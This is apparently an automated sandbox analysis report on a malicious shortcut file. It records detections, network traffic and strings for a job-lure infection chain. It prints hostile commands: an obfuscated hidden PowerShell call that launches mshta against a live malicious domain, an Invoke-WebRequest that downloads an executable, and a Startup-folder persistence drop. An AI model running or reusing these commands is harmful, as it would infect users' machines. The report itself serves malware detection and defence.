SwiftWrite.pif
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3800, TargetFilename: C:\Users\user\AppData\Roaming\BnQwAP.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BnQwAP.exe" , ParentImage: C:\Users\user\AppData\Roaming\BnQwAP.exe, ParentProcessId: 7352, ParentProcessName: BnQwAP.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5544, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BnQwAP.exe" , ParentImage: C:\Users\user\AppData\Roaming\BnQwAP.exe, ParentProcessId: 7352, ParentProcessName: BnQwAP.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5544, ProcessName: powershell.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 5328, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 3524, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1'), ProcessId: 3904, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5448, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T07:07:55.769895+010020264341A Network Trojan was detected147.45.49.155443192.168.2.849704TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T07:08:09.118490+010028033053Unknown Traffic192.168.2.849713147.45.49.155443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1]ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeReversingLabs: Detection: 30%
Multi AV Scanner detection for submitted file
Source: lKin1m7Pf2.lnkVirustotal: Detection: 25%Perma Link
Source: lKin1m7Pf2.lnkReversingLabs: Detection: 21%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.1528320950.0000024648EE8000.00000004.00000020.00020000.00000000.sdmp, duychuan1[1].6.dr
Source: Binary string: sethc.pdb source: duychuan1[1].6.dr
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00007FF65605C7C0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00007FF65605B7C0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560671F4 FindFirstFileW,FindClose,16_2_00007FF6560671F4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560672A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00007FF6560672A8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00007FF65605BC70
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65606A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00007FF65606A874
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65606A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,16_2_00007FF65606A350
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656066428 FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF656066428
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65606A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,16_2_00007FF65606A4F8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656022F50 FindFirstFileExW,16_2_00007FF656022F50

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2026434 - Severity 1 - ET MALWARE VBScript Redirect Style Exe File Download : 147.45.49.155:443 -> 192.168.2.8:49704
Source: global trafficHTTP traffic detected: GET /Job_Description.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /BnQwAP.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /jzuVDmQ.txt HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 147.45.49.155:443
Source: global trafficHTTP traffic detected: GET /duychuan1 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /kfSlwlO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tiffany-careers.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65606E87C InternetReadFile,16_2_00007FF65606E87C
Source: global trafficHTTP traffic detected: GET /duychuan1 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Job_Description.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /BnQwAP.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /kfSlwlO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /jzuVDmQ.txt HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.14.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000009.00000002.1712169554.000001DD3E97A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1484717292.000001AADF32D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1712169554.000001DD3E751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CAE71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43C26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB91A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000009.00000002.1712169554.000001DD3E97A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000000.1808350972.0000000000489000.00000002.00000001.01000000.00000010.sdmp, SwiftWrite.pif, 0000001D.00000000.1948220932.0000000000689000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 2D85F72862B55C4EADD9E66E06947F3D0.14.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.1484717292.000001AADF36D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1484717292.000001AADF359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1712169554.000001DD3E751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CAE71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000008.00000003.1518226211.000001FEC7F41000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1518226211.000001FEC7ED0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000009.00000002.1712169554.000001DD3E97A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000002.1919253778.00000217E3258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.c
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.co
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1712169554.000001DD3EB85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB0A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/B
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/Bn
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/BnQ
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/BnQw
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/BnQwA
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/BnQwAP
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/BnQwAP.
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/BnQwAP.e
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/BnQwAP.ex
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/BnQwAP.exe
Source: powershell.exe, 00000009.00000002.1712169554.000001DD3EB85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/Job_Description.pdf
Source: powershell.exe, 00000005.00000002.1484717292.000001AADF472000.00000004.00000800.00020000.00000000.sdmp, lKin1m7Pf2.lnkString found in binary or memory: https://tiffany-careers.com/duychuan1
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/duychuan1$global:?
Source: powershell.exe, 00000005.00000002.1484360037.000001AADD6D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duychuan1;.
Source: powershell.exe, 00000005.00000002.1484717292.000001AADF7BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duychuan1P
Source: powershell.exe, 00000005.00000002.1484592899.000001AADEE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duychuan1a
Source: powershell.exe, 00000005.00000002.1487314148.000001AAF73FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duychuan1ken=b03f5f
Source: powershell.exe, 00000005.00000002.1484717292.000001AADF5FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1484717292.000001AADF311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duychuan1p
Source: powershell.exe, 00000015.00000002.1815831767.00000217CB0A1000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.16.drString found in binary or memory: https://tiffany-careers.com/jzuVDmQ.txt
Source: BnQwAP.exe, 00000010.00000002.1753379248.00000295A1999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/kfSlwlO
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe.17.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656070D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00007FF656070D24
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656070D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00007FF656070D24
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656070A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,16_2_00007FF656070A6C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656057E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,16_2_00007FF656057E64

System Summary

barindex
Binary is likely a compiled AutoIt script file
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4c0db34d-3
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_1ba6d2c9-3
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4EC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3258dac2-3
